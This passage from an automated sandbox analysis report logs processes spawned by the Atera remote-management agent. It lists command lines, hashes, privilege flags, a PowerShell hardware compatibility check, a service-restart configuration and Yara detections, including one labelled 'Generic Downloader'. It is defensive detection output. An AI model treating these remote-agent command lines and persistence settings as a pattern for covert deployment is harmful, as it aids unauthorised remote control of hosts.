                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

Target ID:20
Start time:06:58:29
Start date:06/01/2025
Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "cb3e2cb9-55c1-438a-8389-94c341441cc1" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000P2oAPIAZ
Imagebase:0x2156b880000
File size:186'408 bytes
MD5 hash:9D8D50D2789C2A8D847D7953518A96F6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1981577832.0000021500047000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1981577832.000002150008D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1984014112.000002156BD20000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000000.1961278345.000002156B882000.00000002.00000001.01000000.00000016.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1983167584.000002156BA8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1983167584.000002156BA42000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1981577832.0000021500001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1983167584.000002156BA4C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1983167584.000002156BA00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1981577832.0000021500135000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1981577832.0000021500079000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
Has exited:true

Target ID:21
Start time:06:58:29
Start date:06/01/2025
Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "b007e062-743d-47e1-a870-a586f83a0d8d" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000P2oAPIAZ
Imagebase:0x15e7cf20000
File size:186'408 bytes
MD5 hash:9D8D50D2789C2A8D847D7953518A96F6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.1982795635.0000015E7D008000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.1982795635.0000015E7D085000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.1982795635.0000015E7D000000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.1981546902.0000015E00001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.1981546902.0000015E00079000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.1982795635.0000015E7D03C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.1982795635.0000015E7D0C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.1983698172.0000015E7D250000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.1983854282.0000015E7D2E2000.00000002.00000001.01000000.00000018.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.1982795635.0000015E7D0D3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:22
Start time:06:58:29
Start date:06/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:06:58:29
Start date:06/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                                                                                                              Start time:06:58:32
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "8786f2fa-f7ec-48f3-845c-8cd509c85e9f" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000P2oAPIAZ
                                                                                                                                                                                                                                                                                              Imagebase:0x247406b0000
                                                                                                                                                                                                                                                                                              File size:186'408 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:9D8D50D2789C2A8D847D7953518A96F6
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.1999548038.0000024740947000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:25
Start time:06:58:32
Start date:06/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:06:58:32
Start date:06/01/2025
Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
Imagebase:0x2162fb50000
File size:145'968 bytes
MD5 hash:477293F80461713D51A98A24023D45E8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2900108892.00000216491EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:27
Start time:06:58:32
Start date:06/01/2025
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
Imagebase:0x7ff6f92a0000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:06:58:32
Start date:06/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                                                                                                              Start time:06:58:33
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "1b6d15b4-846f-4811-aa62-e314f5d5945b" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000P2oAPIAZ
                                                                                                                                                                                                                                                                                              Imagebase:0x281bd720000
                                                                                                                                                                                                                                                                                              File size:186'408 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:9D8D50D2789C2A8D847D7953518A96F6
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2395847450.00000281D69E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2319840745.00000281BD900000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2320145221.00000281BD95C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2327349674.00000281BE452000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2380233543.00000281D6940000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2320145221.00000281BD92E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2327349674.00000281BE1D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2327349674.00000281BE421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2398010393.00000281D6A40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2327349674.00000281BE267000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2320145221.00000281BD94C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2327349674.00000281BE38A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2327349674.00000281BE44F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2320145221.00000281BD993000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2320145221.00000281BD910000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2327349674.00000281BE4E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                                                                                                              Start time:06:58:33
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                                                                                                              Start time:06:58:34
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"powershell.exe" -NoProfile -Command " ################################################################################################ # Windows 11 Compatibility Check Script # ################################################################################################ # Compatibility flag $IsCompatible = $true # Check if current OS is Windows 10 $OSVersion = (Get-CimInstance -Class Win32_OperatingSystem).Caption if (-not $OSVersion.Contains('Windows 10')) { return } # Architecture x64 $Arch = (Get-CimInstance -Class CIM_ComputerSystem).SystemType $ArchValue = 'x64-based PC' if ($Arch -ne $ArchValue) { $IsCompatible = $false } # Screen Resolution $ScreenInfo = (Get-CimInstance -ClassName Win32_VideoController).CurrentVerticalResolution $ValueMin = 720 if ($ScreenInfo -le $ValueMin) { $IsCompatible = $false } # CPU composition $Core = (Get-CimInstance -Class CIM_Processor | Select-Object *).NumberOfCores $CoreValue = 2 $Frequency = (Get-CimInstance -Class CIM_Processor | Select-Object *).MaxClockSpeed $FrequencyValue = 1000 if (-not (($Core -ge $CoreValue) -and ($Frequency -ge $FrequencyValue))) { $IsCompatible = $false } # TPM $TPM2 = $false if ((Get-Tpm).ManufacturerVersionFull20) { $TPM2 = -not (Get-Tpm).ManufacturerVersionFull20.Contains('not supported') } if ($TPM2 -contains $false) { $IsCompatible = $false } # Secure Boot $SecureBoot = Confirm-SecureBootUEFI if ($SecureBoot -ne $true) { $IsCompatible = $false } # RAM available $Memory = (Get-CimInstance -Class CIM_ComputerSystem).TotalPhysicalMemory $SetMinMemory = 4294967296 if ($Memory -lt $SetMinMemory) { $IsCompatible = $false } # Storage available $ListDisk = Get-CimInstance -Class Win32_LogicalDisk | Where-Object { $_.DriveType -eq '3' } $SetMinSizeLimit = 64GB $DiskCompatible = $false foreach ($Disk in $ListDisk) { if ($Disk.FreeSpace -ge $SetMinSizeLimit) { $DiskCompatible = $true } } if (-not $DiskCompatible) { $IsCompatible = $false } # Output final result $IsCompatible "
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001F.00000002.2057309796.0000022F4BF90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001F.00000002.2059219762.0000022F4CCAB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                                                                                                              Start time:06:58:34
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                                                                                                              Start time:06:58:35
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" 52187e48-563c-468d-9785-3542f81fb412 "1aa92b0c-e5fb-4470-8edf-86a7f92c710d" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIiwiUmVxdWVzdFBlcm1pc3Npb25PcHRpb24iOm51bGwsIlJlcXVpcmVQYXNzd29yZE9wdGlvbiI6bnVsbCwiUGFzc3dvcmQiOm51bGx9" 001Q300000P2oAPIAZ
                                                                                                                                                                                                                                                                                              Imagebase:0x2ef73bc0000
                                                                                                                                                                                                                                                                                              File size:72'744 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:67FEF41237025021CD4F792E8C24E95A
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                                                                                                                              Start time:06:58:35
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:35
                                                                                                                                                                                                                                                                                              Start time:06:58:37
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" 52187e48-563c-468d-9785-3542f81fb412 "69e8737b-1308-4d43-800a-39f09304f118" agent-api.atera.com/Production 443 or8ixLi90Mf "syncprofile" 001Q300000P2oAPIAZ
                                                                                                                                                                                                                                                                                              Imagebase:0x1f71c980000
                                                                                                                                                                                                                                                                                              File size:407'080 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:810F893E58861909B134FA72E3BC90CD
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:36
                                                                                                                                                                                                                                                                                              Start time:06:58:37
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:37
                                                                                                                                                                                                                                                                                              Start time:06:58:49
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6f8440000
                                                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.2246580986.0000021E95E00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000003.2164597390.0000021E96060000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.2246580986.0000021E95E0B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.2246818661.0000021E96040000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.2246580986.0000021E95E23000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:38
                                                                                                                                                                                                                                                                                              Start time:06:58:49
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:39
                                                                                                                                                                                                                                                                                              Start time:06:58:49
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cscript.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6fd2d0000
                                                                                                                                                                                                                                                                                              File size:161'280 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000027.00000002.2245155748.0000014BCFED0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:40
                                                                                                                                                                                                                                                                                              Start time:06:58:50
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\sppsvc.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\sppsvc.exe
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff68a330000
                                                                                                                                                                                                                                                                                              File size:4'630'384 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:320823F03672CEB82CC3A169989ABD12
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:41
                                                                                                                                                                                                                                                                                              Start time:06:58:58
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
